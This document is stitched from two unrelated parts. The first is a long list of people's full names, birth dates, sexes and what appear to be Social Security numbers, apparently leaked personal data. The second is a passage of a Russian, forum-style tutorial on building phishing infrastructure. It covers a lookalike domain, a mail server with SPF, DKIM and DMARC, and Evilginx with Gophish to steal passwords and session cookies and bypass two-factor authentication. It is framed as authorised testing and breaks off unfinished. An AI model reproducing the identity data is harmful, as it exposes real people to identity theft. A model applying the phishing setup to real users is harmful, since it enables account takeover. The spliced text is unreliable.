DICKSON DANE J 19680726 Male 528374501
PACE BRADLEY W 19680731 Male 528512830
MCBAIN CYNTHIA REBECCA 19680801 Female 528476665
KELSCH JOAN K 19680804 Female 528435314
DUNCAN ROBERT B 19680810 Male 528190687
DEAN BRENT T 19680817 Male 528377521
JONES JAMIE J 19680907 Male 528150076
DRECKSEL JASON L 19681007 Male 528392493
FERGUSON SCOTT B 19681008 Male 528397327
DENKERS BRYAN TROY 19681010 Male 528315677
HOWELL DEANNA 19681013 Female 528278032
BATTAGLIA SANDRA D 19681027 Female 528218282
BEDORE BRANDON B 19681105 Male 528290637
HOSS ARIANA LUCRETIA 19681106 Female 528135576
PERRY BRIAN K 19681106 Male 528270583
KROGH LORI 19681130 Female 528531648
PETERSON TRENT G 19681204 Male 528967585
PACE BARBARA MINER 19681214 Female 528530390
DULLE RICHARD VICTOR 19681215 Male 528924538
JOHNSON PATRICIA S 19681221 Female 528490871
MALONE SEAN PATRICK 19681230 Male 528372642
HIRST PAUL M 19690125 Male 528412190
COFFMAN JOANN KATHLEEN 19690303 Female 528130964
BILLS SINDY RAE 19690314 Female 528476417
FUHRMANN SUZETTE LANAE 19690315 Female 528238049
MCCOARD BART R 19690319 Male 528515206
SHEFFIELD MATTHEW BOYD 19690325 Male 528194832
CRAWFORD PAMELA DAY 19690402 Female 528880480
HEIBEL CINDY MARIE 19690426 Female 528138080
GESS RONALD GLENN 19690506 Male 528393871
HUMBLE JOHN HUFF 19690510 Male 528371385
STECK BRIAN K 19690517 Male 528213267
AMOR SARIAH JANE 19690524 Female 528456737
BRADSHAW CHARLES C 19690524 Male 528354228
BUTTERFIELD JOSEPH SHANE 19690525 Male 528158527
DRECKSEL SALLY LYNNE 19690602 Female 528530236
DUNCAN LIBBY CHRISTINE 19690609 Female 528084115
BRIGGS JANAE CARSON 19690615 Female 528217669
GULICK CHRISTAL JEANETT 19690616 Female 528191515
BOSTER TIA M 19690618 Female 528454094
JEPPESEN BRUCE L 19690621 Male 528178915
REED TIFINY ANN MARIE 19690628 Female 528577892
CONTRERAS JOSE ANTONIO 19690719 Male 528141902
MUSSER ELIZABETH 19690720 Female 528473623
WEBB STEPHEN G 19690722 Male 528530887
JONES ALEXANDER ALFRED 19690801 Male 528215823
OTOOLE KIMBERLY B 19690810 Female 528611214
KLEIER JILL M 19690813 Female 528392632
FINNEGAN DAVID W 19690818 Male 528495678
WILLIAMS MICHAEL JOHN 19690822 Male 528216708
GLADDEN DONALD R 19690823 Male 528478790
PHILLIPS CATHY JO 19690829 Female 528115462
ARMISTEAD PETER R 19690901 Male 528234781
OTT JULIE LIGHTNER 19690913 Female 528531039
KUMP HEIDI PASCHAL 19690917 Female 528452048
DODDS WILLIAM C 19690919 Male 528439683
MCCLEAN TODD DOUGLAS 19690922 Male 528535158
NAYLOR HEIDI LIBERTINI 19691017 Female 528250912
BARKER SHAUNA S 19691101 Female 528479921
WHITAKER-LEE WYNDI L 19691101 Female 528157209
GEHL RANDY H 19691112 Male 528414747
BOATMAN MARCUS LEE 19691117 Male 528135467
RUSSO STELLA CECILIA 19691120 Female 528793314
RICHARDSON R HANS ZACHARY 19691121 Male 528080823
CRIM MICHAEL ALAN 19691203 Male 528494410
NAUMANN ALYSSA P 19691204 Female 528275576
SOMMERFELD JONATHAN GLENN 19691214 Male 528492055
DAWSON BARBARA HANDY 19691217 Female 528432524
BOAL DEEDEE KAYE 19700102 Female 528086109
RONDOMANSKI KATHY JO 19700105 Female 528594835
POMERINKE RONNIE JAY 19700108 Male 528082274
ASHMENT TERRI LYNN 19700110 Female 528315504
REYNOLDS LORI ALYCE 19700 128 Female 528155875
SMITH MARK DOUGLAS 19700210 Male 528191902
KIRK HILARY ANN 19700211 Female 528066098
BEAGLEY SHIRLEY 19700214 Female 528947725
COLEMAN JEANNIE CELESTE 19700311 Female 528376865
LANGE TRENNA L 19700314 Female 528377188
STOOPS SHEILA K 19700322 Female 528490942
JOYCE AURA LEE 19700407 Male 528392938
WILLYARD CURTIS REED 19700411 Male 528599588
JONES MAURIE D 19700419 Female 528572598
MULL ROBERT L 19700423 Male 528211041
CASE STACY RAE 19700505 Female 528047830
PRATER KIMBERLY ANN 19700512 Female 528117692
HARRIS HEIDI T 19700520 Female 528371735
FARKAS JASON TROY 19700526 Male 528534550
FOX CHARLIE BOYD 19700526 Male 528961309
GARCIA MANUEL TENA 19700531 Male 528879868
BUCHANAN-SMITH KIMBERLY ANN 19700607 Female 528333356
NORRIS FREDRICA ANNE 19700608 Female 528117874
TAPP SAND KOSUTH KULAK 19700614 Male 528111892
JOHNSON RACHEL M 19700615 Female 528453745
SPECKMAN JENNIFER 19700623 Female 528210133
SLOAN RICHARD ANDREW 19700624 Male 528133684
FORREST GARY J 19700629 Male 528570760
CROSS TIFFANY WARE 19700712 Female 528678728
HARDMAN LAURA ANDERSEN 19700713 Female 528175649
OWEN DANA L 19700715 Female 528613242
WELSH JENNIFER LYNN 19700715 Female 528671756
TEIBERIS BRETT LOUIS 19700723 Male 528476351
EAGLE AMY HEATHER 19700725 Female 528157454
GERHOLDT ROBERT A 19700730 Male 528513402
HARRIS MICHELLE LEE 19700813 Female 528210255
KETTLEWELL LISA R 19700912 Female 528559308
HAIL ANDREA C 19700915 Female 528414363
GABBITAS MARGARET ANN 19701020 Female 528271524
OTTINGER JULENE WHITE 19701022 Female 528459268
DAVIS HEATHER PAUL 19701027 Female 528573634
TOWNSEND ELIZABETH MARIE 19701103 Female 528576567
NIELSON BRADY ALLAN 19701111 Male 528652182
WILLIAMS BARRY ALLEN 19701112 Male 528216672

JAMES LISA DAWN 19701120 Female 528139976
DEFRIEZ MICHELLE A 19701121 Female 528573167
SHAW JASON LEHI 19701130 Male 528610582
VANDERHULE TROY DANIEL 19701203 Male 528088569
HOLDER MARNIE JO 19701207 Female 528891554
KIRKPATRICK GERALD ANTHONY 19701218 Male 528338893
CARTER KATHLEEN M 19701219 Female 528593060
COMBS TOMMY MARTIN 19701221 Male 528619397
STRAWBRIDGE LORI LYNN 19701229 Female 528216819
FINNEGAN LAURA 19701231 Female 528292661
TAYSOM TAMERA LYNN 19710109 Female 528069873
HADDAN RICHARD THOMAS 19710111 Male 528613400
SEWELL JON ISAAC 19710117 Male 528066225
BONNETT CHERYL LOUISE 19710127 Female 528903998
BRENNER SEAN THOMAS 19710214 Male 528133781
MOHR PATRICK REED 19710215 Male 528150391
LOFGREN SAMUEL D 19710216 Male 528473473
MCGEHEE-REED CHRISTINA L 19710218 Female 528061800
NUNEZ HECTOR RAUL 19710218 Male 528796134
LAWSON DAWNA MARIE 19710220 Female 528067304
WEBSTER JACOB W 19710227 Male 528778226
BURDETT DIANE 19710310 Female 528595477
THORLEY JANALEE SANDERS 19710319 Female 528290458
CONKEL SEAN PATRICK 19710422 Male 528577221
BEGEY TODD CHRISTIAN 19710602 Male 528813167
TROYER TRAVIS CHRISTO 19710602 Male 528577197
NICHOLS ASHLEY LYNNE 19710610 Female 528577956
COOK JASON AARON 19710619 Male 528292699
SMITH GARRETT BONA 19710619 Male 528513610
NIELSEN JAMES D 19710702 Male 528675156
ANDERSON LAURA V 19710703 Female 528375184
BARNES MINDY 19710706 Female 528110370
ZIMMERMAN JENNIFER ELLEN 19710712 Female 528554927
BARBER MELANIE C 19710714 Female 528196959
BOUNDS STACI ANE 19710717 Female 528294594
SAWYER ANGELA L 19710719 Female 528949629
STERRETT KIMBERLY ANN 19710814 Female 528350900
ESTEBAN MARTIN MATEO 19710824 Male 528161728
CHRISTIANSON MELISSA ANN 19710827 Female 528155366
JENSEN KAYLINN 19710919 Female 528138019
GORNEY DUSTIN MICHAEL 19710925 Male 528637631
GAYER CHARLOTTE ANN 19710930 Female 528138556
WARREN BRANDON SHAYNE 19711002 Male 528210816
YATES YORK JAY 19711009 Male 528779617
SWASEY SCOTT PIERCE 19711016 Male 528679578
JAFFE BRYAN L 19711025 Male 528210587
DALTON JENNIFER MARY 19711026 Female 528694025
MORROW JEREMI CADE 19711104 Male 528730905
GILL TRACY 19711106 Female 528558482
UZELAC TAMARA 19711108 Female 528554969
HAYNIE MARLENE GAYLE 19711202 Female 528236500
TUMLINSON LEON SHANE 19711209 Male 528358010
LUCUS BRETT ALAN 19720113 Male 528619210
COX JOSEPHINE ARMISTEAD 19720121 Female 528235677
CHARLESWORTH DACIA 19720204 Female 528518813
BRONSON JUDD R 19720213 Male 528969961
JOHNSTON HOLLY THOMSON 19720227 Female 528295369
MERRILL DANIEL KENNETH 19720229 Male 528171760
POTTS LARRY M 19720308 Male 528437017
HILL SONYA M 19720311 Female 528313809
REECE TAIT T 19720319 Male 528793225
HAMILTON REBECCA L 19720321 Female 528599177
BERTCH WESLEY BAHE 19720329 Male 528028448
TURNER MALENA RUTH 19720403 Female 528154862
YOUNG TAMMY LARKIN 19720405 Female 528049858
LOTT JANAE P 19720412 Female 528299541
BYRD LUCILE 19720429 Female 528131996
WEIGHT JOSEPH W 19720507 Male 528499018
FORSBERG CHRISTOPHER T 19720513 Male 528137860
MUTZ LISA L 19720515 Female 528570362
TRAVIS TERRA R 19720525 Female 528375886
BRADFORD MICHAEL ADAM 19720606 Male 528437432
WHITE DERRICK 19720612 Male 528336900
WINTER LINDA SUE 19720618 Female 528496418
LAKE CARMEN B 19720705 Female 528133377
TRIEU THOMAS 19720710 Male 528319231
ELSWICK JOHN COLDEN 19720715 Male 528698346
ZITTING WILLIAM O 19720717 Male 528930865
HINOJOSA GRAVIEL 19720726 Male 528049180
CARTER JUSTIN BRIAN 19720802 Male 528451816
CLARK BOBBIE J 19720803 Female 528490878
WINCHESTER MARIE BEHUNIN 19720822 Female 528983751
LOTT DONOVAN JONES 19720826 Male 528214767
LAGUD JENNIFER LEE 19720908 Female 528047802
POLL STEVEN MARLOW 19720915 Male 528652284
BISHOP RICHELLE 19720920 Female 528770334
BALDWIN SIRRILDA G 19720922 Female 528438096
PRUENTE MICHELLE 19721007 Female 528298928
TOWNSEND KENNETH R 19721025 Male 528576634
BRADLEY JASON M 19721029 Male 528214799
BRADLEY JASON M 19721029 Male 528214799
SPERRY ALEN PAUL 19721106 Male 528595707
WOOLLEY FRANK CABOT 19721109 Male 528552777
RIOS ALBERTO 19721122 Male 528948153
ELMBORG CAREY S 19721128 Female 528431343
HUND KIMBERLY R 19721128 Female 528084339
BREWER DOUGLAS TY 19721208 Male 528776401
RILEY BRADLEY MARSHALL 19721217 Male 528116784
RILEY BRADLEY MARSHALL 19721217 Male 528116784
FORET CATHERINE DOLORES 19721220 Female 528061540
DUPAIX MONICA TAYLOR 19721222 Female 528699916
JONES CHRISTY N 19721222 Female 528069060
SCHEYTT JUSTIN RILL 19730107 Male 528559960
MCMAHAN DONNA DARLENE 19730116 Female 528060326
MARIN ELI 19730217 Male 528821902
NUGENT REBECCA THOMAS 19730218 Female 528631308
ABDULLA ALIA M 19730220 Female 528454271
EATON MICHAEL E 19730306 Male 528793623
EATON MICHAEL E 19730306 Male 528793623
EATON MICHAEL E 19730306 Male 528793623
FLORES ALFREDO H 19730312 Male 528748576
SMITH TONYA RENEE 19730314 Female 528191988
CAREY CARRI A 19730315 Female 528358635
AMADOR CHASE R 19730317 Male 528119376
GONZALES JERAMEY E 19730319 Male 528089395
COLIN-BOCANEGRA RAUL 19730321 Male 528673751
HAMILTON KELLI DAWN 19730323 Female 528612428
JAMES MICHAEL LEE 19730323 Male 528139882
PRUDDEN JOHN MILTON 19730325 Male 528430390
LEE CHRISTOPHER M 19730405 Male 528454734
VALLONE LATISHA M 19730405 Female 528495759
MCBRIDE DAVID S 19730407 Male 528115397
NORRELL MILES GRIFFIN 19730410 Male 528679535
SNIDER ANNA ALEXIA 19730411 Female 528492108
BARNEY WARREN B 19730413 Male 528830855
CHILTON DANIELLE CHRISTINA 19730420 Female 528679789
BRADEN RYAN P 19730422 Male 528558659
KNORPP KATHLEEN RENEE 19730425 Female 528049581
HINTON JULIE MARIE 19730427 Female 528254575
ZUNIGA PEDRO 19730428 Male 528103526
WEEKS RICHARD D 19730507 Male 528491351
WIERINGA LASHELLE ANN 19730513 Female 528085566
MARIN CAMILO LUNA 19730610 Male 528329437
MARIN CAMILO LUNA 19730610 Male 528329437
REYES ALVINO J 19730614 Male 528186428
BIRCH JOSHUA DAVID 19730701 Male 528914636
PADILLA ZENAIDA LUISA 19730706 Female 528558962
RUESCH CHRISTOPHER LYNN 19730717 Male 528315623
ALDRICH ANGELA 19730731 Female 528276085
MCHENRY ESTHER M 19730810 Female 528259272
MAGEE SEAN STEVEN 19730823 Male 528255900
HAAS EMILY 19730828 Female 528913425
ERICKSON KAYSEE V 19730901 Female 528610233
CULLINANE SAMANTHA SNYDER 19730910 Female 528064893
CHRISTENSEN KEN D 19730918 Male 528796314
WILLIAMS DELTA DAWN 19730925 Female 528132338
TIMPERLEY TRINA L 19730926 Female 528593302

[/ ISPOILER][/ CLIKE][/CLIKE]

В этой статье я объясню, как построить инфраструктуру для симуляции фишинговой атаки в рамках тестирования организации. Мы создадим с нуля почтовый сервер, установим и настроим обратный прокси Evilginx, а затем внедрим его в фишинговый фреймворк Gophish. В конце я покажу на практике процесс проведения фишинговой атаки с перехватом логина, пароля и сессионных cookie, c последующим обходом двухфакторной аутентификации.

Связка Evilginx и Gophish​

Два фреймворка, которые мы будем использовать для проведения фишинговой кампании, называются Evilginx и Gophish. Это два самостоятельных инструмента, которые выполняют разные задачи.

Gophish — это программа с открытым кодом, созданная Джорданом Райтом. Gophish позволяет проводить автоматизированные фишинговые рассылки и таким образом имитировать действия злоумышленника.

Evilginx — это обратный прокси‑сервер, который проксирует соединение между пользователем и целевым веб‑ресурсом, позволяя перехватить логин, пароль и ключи сеанса. С помощью этого фреймворка можно обойти двухфакторную аутентификацию. Автор Evilginx — Куба Грецки.

Есть две версии интеграции этих двух инструментов. Первая — неофициальная, ее разработал Дилан Эванс, он же fin3ss3g0d. Она включает в себя более расширенный набор возможностей вроде SMS-рассылок и генерации QR-кодов, а также некоторые другие отличия от официальной версии.

Официальную интеграцию разработал автор Evilginx Куба Грецки, и появилась она относительно недавно — в апреле 2024 года. На данный момент в ней меньше функций, чем в версии fin3ss3g0d, но инструмент постоянно обновляется, и, скорее всего, все недостающее добавят. В статье я буду использовать именно эту версию интеграции.

Начинаем строить инфраструктуру​

Для начала необходимо арендовать VPS/VDS и доменное имя. Нам хватит следующей конфигурации: 1 Гбайт ОЗУ, 20 Гбайт SSD и один процессор. В качестве ОС — Ubuntu 20.04.

Получаем креды от сервера, подключаемся к машине по SSH и проводим базовую настройку: создаем нового пользователя и добавляем его в группу sudo, создаем ключи SSH, отключаем аутентификацию по паролю, настраиваем порты, правила файрвола и так далее.

Разобравшись с сервером, приступаем к созданию и настройке домена. Для этого выбираем любой сервис, предоставляющий услуги аренды. Один из ключевых компонентов фишинговой атаки — это доменное имя, которое введет пользователя в заблуждение. Этот процесс называется тайпсквоттинг, и вариантов здесь может быть много.

Я решил создать неприметный домен webaccount.site, чтобы потом добавить к нему поддомены, содержащие названия известных организаций, так как поддомены необязательно должны быть уникальными. Например, если добавим поддомен microsoft, у нас получится microsoft.webaccount.site.

Теперь приступим к настройке DNS. Первым делом нужно установить основную запись типа А, которая связывает доменное имя с IP-адресом сервера. Для этого редактируем ресурсные записи в разделе управления зоной DNS у регистратора.

В дальнейшем при создании фишинговых адресов будет использоваться множество поддоменов и для каждого такого поддомена потребуется отдельная запись типа A, однако можно использовать и запись типа CNAME, передав ей в качестве аргумента регулярное выражение «звездочка».

Этот тип записи сопоставит псевдоним (поддомен) с каноническим именем домена (webaccount.site) в момент генерации фишингового адреса и получения TLS/SSL- сертификата в Evilginx.

Подождем, пока DNS-записи распространятся (это может занять некоторое время, от 15 минут до нескольких часов), и проверим работоспособность сервера. Для этого просто обращаемся к домену через браузер.

Домен успешно привязался к серверу. После аренды домена желательно подождать хотя бы неделю: чем домен старше, тем меньше вероятность, что он окажется в черных списках. Во время моих первых попыток я регистрировал домен и сразу же использовал его в имитации фишинговой атаки, из‑за чего его отстреливали в течение суток. Раз с доменом разобрались, приступим к установке почтового сервера.

Поднимаем почтовый сервер​

SMTP-сервер — один из ключевых компонентов нашей будущей инфраструктуры. Его задача — выступать в роли ретранслятора. Настройка почтового сервера несложная, но требует множества последовательных действий.

Первым делом необходимо установить две записи. Одна — типа А с именем mail, указывающая на IP-адрес сервера.

Вторая запись — типа MX, которая указывает на сервер, обрабатывающий электронную почту.

Теперь можно приступить к установке и настройке Postfix. Подключаемся к своему VPS/VDS по SSH и запускаем установку:

Code:Copy to clipboard

sudo apt install postfix

При настройке в первом шаге выбираем пункт Internet Site.

Вводим доменное имя, которое будет определяться при отправке почты.

Указываем почтовый адрес администратора домена. Можно оставить пустым (что не рекомендуется), тогда почта, предназначенная для администратора, будет отправляться в /var/mail/nobody.

Дальше прописываем адреса вот в таком формате:

Code:Copy to clipboard

<hostname>, <domain>, localhost.com, localhost

Отказываемся от принудительного выполнения синхронизации обновлений.

Поле с локальной сетью не трогаем и оставляем по умолчанию.

Размер почтового ящика оставляем со значением 0, в этом случае он будет определяться общим дисковым пространством.

Символ, который будет использоваться для определения расширения локального адреса, — ставим плюсик.

И в последней настройке выбираем используемые протоколы — all.

После настройки установку Postfix можно считать завершенной. Проверяем при помощи утилиты netcat, запустился ли почтовый сервер. Достаточно постучаться на 25-й порт нашего хоста (порт SMTP по умолчанию).

Почтовый сервер запущен, но одной установки мало, необходимо также настроить ресурсные записи, чтобы почта доходила до конечной точки. Если пропустить этот важный этап, почта не то что будет попадать в спам, она в принципе не будет рассматриваться почтовыми серверами. Для успешной доставки сообщений необходимо настроить ресурсные DNS-записи типа TXT — SPF, DKIM, DMARC.

Настраиваем SPF, DKIM и DMARC​

SPF​

Начнем с записи SPF (Sender Policy Framework). Это текстовая запись, которая описывает то, какие хосты имеют право отправлять почту от имени домена, то есть это список доверенных серверов. По сути, SPF — это механизм, проверяющий, авторизован ли хост, отправляющий электронное письмо от определенного доменного имени.

Чтобы такое правило работало, создаем запись TXT в панели управления доменом.

Эта запись определяет, что электронную почту от имени домена могут отправлять серверы, указанные в записях MX и A домена, а также имеющие IP-адреса из диапазона 94.142.141.0/24. Почта от других хостов будет помечена как подозрительная.

Ты можешь воспользоваться веб‑инструментом SPF Wizard, чтобы создать свои правила SPF.

DKIM​

Второй записью настроим DKIM (DomainKeys Identified Mail). Это механизм проверки электронной почты, задача которого — предотвращать подделку сообщений. Для этого применяется асимметричное шифрование: каждое сообщение подписывается закрытым ключом.

DKIM использует пары ключей: закрытый, к которому имеет доступ только почтовый сервер, и открытый, который прописывается в текстовой DNS-записи, а затем используется получателем для проверки легитимности сообщения.

Настройка этой записи потребует множество шагов, будь внимателен при их выполнении — сделать что‑то не так довольно легко. Полное руководство по настройке DKIM есть на [DigitalOcean](https://www.digitalocean.com/community/tutorials/how-to- install-and-configure-dkim-with-postfix-on-debian-wheezy), я не буду полностью переписывать его, а только опишу ключевые моменты.

Первым делом устанавливаем утилиту OpenDKIM:

Code:Copy to clipboard

sudo apt update
sudo apt install opendkim opendkim-tools

И редактируем файл /etc/opendkim.conf. Добавим следующие строки (номер порта Socket выбираем любой, который не занят):

Code:Copy to clipboard

AutoRestart Yes
AutoRestartRate 10/1h
UMask 002
Syslog yes
SyslogSuccess Yes
LogWhy Yes
Canonicalization relaxed/simple
ExternalIgnoreList refile:/etc/opendkim/TrustedHosts
InternalHosts refile:/etc/opendkim/TrustedHosts
KeyTable refile:/etc/opendkim/KeyTable
SigningTable refile:/etc/opendkim/SigningTable
Mode sv
PidFile /var/run/opendkim/opendkim.pid
SignatureAlgorithm rsa-sha256
UserID opendkim:opendkim
Socket inet:12712@localhost

Подключаем расширение Milter к Postfix. Сначала открываем файл /etc/default/opendkim и меняем номер порта вот в этой строке:

Code:Copy to clipboard

SOCKET="inet:12301@localhost"

Новый номер выбираем тот, что указали ранее в opendkim.conf:

Code:Copy to clipboard

SOCKET="inet:12712@localhost"

Затем настраиваем Postfix на использование Milter. Для этого открываем файл /etc/postfix/main.cf и убеждаемся, что присутствуют эти две строки и они не закомментированы:

Code:Copy to clipboard

milter_protocol = 2
milter_default_action = accept

Редактируем следующие строки, меняя номер порта на тот, что определили ранее.

Если таких параметров в файле нет, то прописываем их:

Code:Copy to clipboard

smtpd_milters = inet:localhost:12712
non_smtpd_milters = inet:localhost:12712

Создаем каталоги для взаимодействия с ключами:

Code:Copy to clipboard

sudo mkdir /etc/opendkim
sudo mkdir /etc/opendkim/keys

Указываем доверенные хосты в файле /etc/opendkim/TrustedHosts.

Создаем таблицу ключей, для этого прописываем в файл /etc/opendkim/KeyTable такую строку:

Code:Copy to clipboard

mail._domainkey.webaccount.site webaccount.site:mail:/etc/opendkim/keys/webaccount.site/mail.private

Создаем таблицу подписей, прописав в файл /etc/opendkim/SigningTable эту строку:

Code:Copy to clipboard

*@webaccount.site mail._domainkey.webaccount.site

Теперь приступим к созданию пары открытого и закрытого ключей. Переходим в каталог /etc/opendkim/keys и создаем директорию для домена, в которой будут храниться ключи.

Генерируем ключи следующей командой:

Code:Copy to clipboard

sudo opendkim-genkey -s mail -d webaccount.site

После чего меняем владельца файла с закрытым ключом на учетную запись opendkim.

Осталось добавить содержимое файла mail.txt в текстовую запись DNS в панели управления доменом. Выводим содержимое файла в консоль, копируем всю строку, которая находится в скобках, и приводим к нужному формату.

В итоге у меня получилось отформатированное значение, которое нужно добавить в DNS-запись типа TXT с ключом mail._domainkey.

DMARC​

Политика DMARC (Domain-based Message Authentication, Reporting & Conformance) нужна для предотвращения спуфинга электронной почты. Этот протокол, по сути, дополнение к SPF и DKIM. Он определяет правила обработки электронных сообщений, которые поступили с неавторизованных доменов.

Настройка крайне проста, особенно на фоне DKIM. Достаточно создать TXT-запись вроде той, что на скриншоте.

Тестируем SMTP-сервер​

Когда все настроено, время проверить работоспособность сервера SMTP. Для этого можно либо отправить сообщение себе на почту с любого сервиса, либо же воспользоваться mail-тестером. Открываем сайт по ссылке, копируем указанный там почтовый адрес и жмем большую кнопку «Проверить». Теперь мы можем отправить сообщение на выданный нам адрес. Это делается вот такой командой:

Code:Copy to clipboard

echo "Test" | mail -s "Test" [почтовый адрес]

Как видим, почтовый сервер настроен и корректно работает (половину балла мне сняли, потому что домен есть в одном из нескольких черных списков, но это совсем не критично). Если ты сделал ошибки в настройке, в этом отчете они будут указаны.

Ставим и настраиваем Evilginx и Gophish​

Ставим Gophish​

Прежде чем поднимать Evilginx и Gophish, нужно установить в систему язык Go, так как оба этих инструмента работают на нем. Отправляемся на сайт разработчика и открываем страницу установки, скачиваем deb-пакет командой wget и следуем инструкции.

Приступим к установке Gophish. Нам нужно скачать версию с интеграцией в Evilginx из репозитория, тут есть два варианта установки. Первый — скачиваем командой wget архив с релизом для своей ОС со страницы releases, после чего просто разархивируем файл и делаем бинарник Gophish исполняемым командой chmod.

Второй вариант — сборка из исходного кода. Для этого копируем репозиторий и запускаем установку:

Code:Copy to clipboard

sudo git clone https://github.com/kgretzky/gophish/
go build

В результате у нас будет версия Gophish, модифицированная для работы с Evilginx.

Теперь можно приступить к настройке и запуску Gophish. Первым делом редактируем файл config.json. В нем нужно изменить параметр admin_server.listen_url. По умолчанию там указан локальный IP 127.0.0.1. Чтобы Gophish работал не только локально и к нему возможно было подключиться через интернет, нужно изменить этот IP на 0.0.0.0:3333. Номер порта, кстати, можно выставить любой незанятый в системе.

После настройки запускаем исполняемый файл Gophish и сразу ищем в логах логин и пароль по умолчанию для доступа к панели управления.

Теперь переходим в браузер и обращаемся к панели Gophish по адресу своего VPS/VDS с указанным ранее портом.

Вводим креды, которые нашли в логах, после чего у нас открывается форма для изменения пароля по умолчанию. Меняем пароль, снова вводим креды, аутентифицируемся и попадаем в нашу учетную запись Gophish.

Чтобы оптимизировать запуск и дальнейшие фишинговые кампании, нужно настроить Gophish как демон, то есть создать сервис, который будет запускать Gophish в фоновом режиме или останавливать одной командой. В каталоге /etc/init.d находятся сценарии оболочки, которые запускаются системой инициализации SysVinit, поэтому создаем в этом каталоге файл Gophish и добавляем следующий код, указав в параметре appDirectory абсолютный путь к Gophish:

Code:Copy to clipboard

processName=Gophish
process=gophish
appDirectory=/home/zxc/gophish
logfile=/var/log/gophish/gophish.log
errfile=/var/log/gophish/gophish.error
start() {
    echo 'Starting '${processName}'...'
    cd ${appDirectory}
    nohup ./$process >>$logfile 2>>$errfile &
    sleep 1
}
stop() {
    echo 'Stopping '${processName}'...'
    pid=$(/bin/pidof ${process})
    kill ${pid}
    sleep 1
}
status() {
    pid=$(/bin/pidof ${process})
    if [["$pid" != ""| "$pid" != "" ]]; then
        echo ${processName}' is running...'
    else
        echo ${processName}' is not running...'
    fi
}
case $1 in
    start|stop|status) "$1" ;;
esac

Сохраняем файл и прописываем команды для запуска демона и проверки статуса его работы.

Сервис запускается и работает корректно.

Ставим Evilginx​

Копируем официальный репозиторий Evilginx с GitHub:

Code:Copy to clipboard

sudo git clone https://github.com/kgretzky/evilginx2 && cd evilginx2

Evilginx тоже написан на Go, который у нас уже установлен. Поэтому просто выполняем make. Скрипт соберет весь проект и создаст исполняемый файл evilginx в директории build.

Чтобы постоянно не прописывать бесконечные пути, лучше собрать все необходимое в отдельном каталоге. Создаем директорию evilginx в домашнем каталоге и копируем исполняемый файл evilginx вместе с директориями phishlets и redirectors в ~/evilginx:

Code:Copy to clipboard

sudo mkdir ~/evilginx
sudo cp ./build/evilginx ~/evilginx
sudo cp -r ./phishlets/
sudo cp -r ./redirectors

Когда все готово, приступаем к настройке. Запускаем Evilginx:

Code:Copy to clipboard

sudo ./evilginx -p phishlets/

Нам необходимо определить IP-адрес и домен, а также интегрировать Gophish. В консоли Evilginx прописываем эти команды:

Code:Copy to clipboard

config domain [ваш домен]
config ipv4 [IP вашего VPS/VDS]
config Gophish admin_url [URL, на котором поднят gophish]
config Gophish api_key [ключ API gophish]
config Gophish insecure true

Ключ API Gophish можно найти в панели управления Gophish, перейдя на вкладку Account Settings.

Теперь выполняем команду config gophish test для тестирования соединения Evilginx и Gophish.

Сообщение гласит о том, что соединение успешно.

На этом этапе мы построили основную часть инфраструктуры. Теперь можно начать подготовку к проведению фишинговой кампании.

Настройка кампании Gophish​

Отправляемся в панель управления Gophish и начинаем настраивать компоненты для рассылки фишинговых сообщений.

Первый компонент — это группы пользователей, которым будут рассылаться письма. Другими словами, это жертвы, точнее, подопытные в нашем тесте.

Предположим, в результате разведки мы получили имена и почтовые адреса работников компании. Все эти данные добавляем в соответствующие поля и нажимаем кнопку Add для каждого пользователя. Либо можешь сразу загрузить файл CSV, содержащий все эти данные. Когда вся инфа добавлена, нажимаем кнопку Save changes.

Следующее, что стоит настроить, — это шаблон электронного письма. Правильно написанное письмо, не вызывающее подозрений, а вызывающее только желание поскорее нажать на ссылку и выполнить все инструкции, — это ключевой компонент успешной фишинговой атаки. Тут уже все зависит от навыков социальной инженерии атакующего. Я создам абсолютно условное фишинговое письмо и не буду расписывать методы социальной инженерии, это отдельная тема.

Чтобы создать фишинговое письмо, я взял HTML-код настоящего сообщения от Microsoft, которое приходило мне на почту, а затем немного изменил его содержание.

В разделе Email Templates вставляем HTML-код и редактируем сообщение на вкладке HTML.

Не забываем поставить галочку Add Tracking Image, которая добавит трекер для отслеживания статистики по открытым письмам. Трекер выглядит как переменная {{.Tracker}} в коде сообщения. Кстати, об этих переменных стоит поговорить чуть подробнее.

При помощи переменных ты можешь менять содержимое сообщения в зависимости от пользователя, которому оно отправлено. Всего переменных десять, нам в первую очередь пригодятся {{.FirstName}}, {{.LastName}} и {{.Email}}, которые подставляют имя, фамилию и адрес почты из настроек групп пользователей. Благодаря им письма не придется персонализировать вручную.

Переменная {{.URL}} подставляет сгенерированную фишинговую ссылку в сообщение. Например, я подставил ссылку через переменную в кнопку «Подтвердить». Про остальные переменные можно прочитать в документации.

Также прописываем заголовок и отправителя сообщения, который будет указан, когда письмо дойдет. Я просто скопировал отправителя из официального сообщения Microsoft, но изменил домен на свой, добавив слово microsoft поддоменом третьего уровня. В итоге мое сообщение будет отправлено от имени «Служба технической поддержки учетных записей Microsoft noreply@microsoft.webaccount.site».

Ниже — фишинговое письмо, которое у меня получилось. Gophish будет подставлять почту пользователя вместо переменной {{.Email}}.

Письмо, как видишь, условное и на практике потребовало бы доработки.

Третий компонент — это профиль отправки, тот, ради которого мы настраивали почтовый сервер и записи DNS. Здесь мы указываем SMTP-ретранслятор, с помощью которого будет происходить рассылка. Открываем вкладку Sending Profile, пишем название профиля, указываем почту отправителя и, наконец, пишем адрес и порт SMTP-ретранслятора. Так как он находится на том же хосте, где мы запустили Gophish, вводим localhost:25 (порт SMTP указывать обязательно). Также не забудь поставить галочку Ignore Certificate Errors.

В этом же окне есть кнопка для отправки тестового письма, обязательно проверяй работоспособность SMTP-ретранслятора перед проведением кампании.

На этом настройка компонентов Gophish закончена, поэтому сворачиваем браузер и приступаем к созданию фишинговых ресурсов Evilginx.

Cоздание фишинговых ресурсов Evilginx​

Первое, с чем нужно ознакомиться, — фишлеты Evilginx. Это самая основа, с их помощью и обходится 2FA. Фишлеты — это конфигурационные файлы YAML, которые определяют, какие домены и поддомены проксировать, подменять, какие аутентификационные данные перехватывать и что с ними делать. В общем, правильно настроенный фишлет определяет технический успех фишинговой атаки. Для каждого веб‑ресурса пишется свой фишлет, однако каждый фишлет — это шаблон.

Я не буду подробно описывать, как работают фишлеты или как их создавать, об этом поговорим в другой раз. Пока же можешь обратиться к официальной документации. Самое главное — не покупай фишлеты в «Телеграме», на форумах и тому подобных ресурсах!

Настраиваем фишлет​

